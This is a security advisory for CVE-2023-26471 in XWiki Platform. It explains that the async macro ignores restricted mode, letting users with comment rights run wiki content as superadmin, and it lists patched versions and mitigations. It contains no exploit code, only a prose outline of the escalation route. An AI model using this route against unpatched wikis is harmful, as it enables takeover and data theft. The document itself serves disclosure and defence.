CVE-2023-26471
Overview
The vulnerability is a privilege escalation issue arising from improper enforcement of restricted execution context in the async macro component of XWiki Platform. Specifically, while comments are intended to run with superadmin rights in a restricted mode that disables dangerous operations, the async macro bypasses this restriction, executing wiki content with full superadmin privileges. The flaw resides in the xwiki-platform-rendering-async-macro module, affecting versions starting from 11.6-rc-1.
Vulnerability Description
XWiki Platform is a generic wiki platform. Starting in version 11.6-rc-1, comments are supposed to be executed with the right of superadmin but in restricted mode (anything dangerous is disabled), but the async macro does not take into account the restricted mode. This means that any user with comment right can use the async macro to make it execute any wiki content with the right of superadmin. This has been patched in XWiki 14.9, 14.4.6, and 13.10.10. The only known workaround consists of applying a patch and rebuilding and redeploying `org.xwiki.platform:xwiki-platform-rendering-async-macro`.
Impact
An authenticated user with comment rights can exploit this vulnerability to execute arbitrary wiki content with superadmin privileges, effectively achieving remote code execution within the application context. This enables unauthorized data access, modification, and potential full system compromise. Exploitation requires authentication with comment permissions but no user interaction beyond that. The CVSS vector (AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H) confirms network attack vector, low complexity, and elevated privileges required, with complete impact on confidentiality, integrity, and availability.
Solution
Remediation requires upgrading XWiki Platform to versions 14.9, 14.4.6, or 13.10.10 where the async macro enforces restricted execution mode correctly. Alternatively, apply the patch and rebuild the org.xwiki.platform:xwiki-platform-rendering-async-macro module as described in the XWiki security advisory GHSA-9cqm-5wf7-wcj7 (https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-9cqm-5wf7-wcj7). Detailed patch instructions and the relevant commit (00532d9f1404287cf3ec3a05056640d809516006) are provided by the vendor.

Full Analysis
The vulnerability in the XWiki Platform arises from an oversight in the execution context of the async macro, which fails to respect the restrictions imposed by the platform's restricted mode. This mode is designed to limit the capabilities of users, particularly those with comment rights, by disabling potentially dangerous operations. However, the async macro's implementation allows users to execute arbitrary wiki content with superadmin privileges, effectively bypassing the intended security measures. This flaw is particularly concerning as it enables unauthorized users to perform actions that could compromise the integrity and confidentiality of the entire wiki environment.
Attack vectors for this vulnerability are varied, primarily revolving around the exploitation of the async macro by users who possess comment rights. An attacker could craft a comment that leverages the async macro to execute malicious scripts or commands, which could lead to unauthorized data access, modification, or even complete takeover of the wiki instance. Scenarios may include injecting scripts that extract sensitive information, manipulate user permissions, or disrupt service availability. The potential for exploitation is exacerbated in environments where user access is not tightly controlled, allowing malicious actors to exploit the vulnerability without needing extensive technical knowledge.
The real-world impact of this vulnerability can be significant, particularly for organizations that rely on the XWiki Platform for collaboration and information sharing. The ability to execute commands with superadmin rights could lead to data breaches, loss of intellectual property, and reputational damage. For businesses, the financial implications could be severe, including costs associated with incident response, legal liabilities, and potential regulatory fines. Furthermore, the disruption of services could impact productivity and erode customer trust, making the risk associated with this vulnerability a critical concern for any organization utilizing the affected product.
To detect and mitigate this vulnerability, organizations should prioritize upgrading to the patched versions of the XWiki Platform, specifically versions 14.9, 14.4.6, and 13.10.10. Regularly monitoring for updates and applying security patches is essential to maintaining a secure environment. Additionally, organizations should implement strict access controls to limit comment rights to trusted users only, thereby reducing the attack surface. Conducting security audits and vulnerability assessments can help identify any existing instances of the vulnerability and assess the overall security posture of the wiki environment. Employing web application firewalls and intrusion detection systems can also provide an additional layer of protection against exploitation attempts.
In conclusion, the vulnerability within the XWiki Platform highlights the critical importance of secure coding practices and thorough testing, particularly in collaborative environments where user-generated content is prevalent. Organizations must remain vigilant in their security practices, ensuring that they not only patch known vulnerabilities but also adopt a proactive approach to risk management. By understanding the nature of such vulnerabilities and implementing robust detection and mitigation strategies, businesses can better safeguard their digital assets and maintain the integrity of their collaborative platforms.
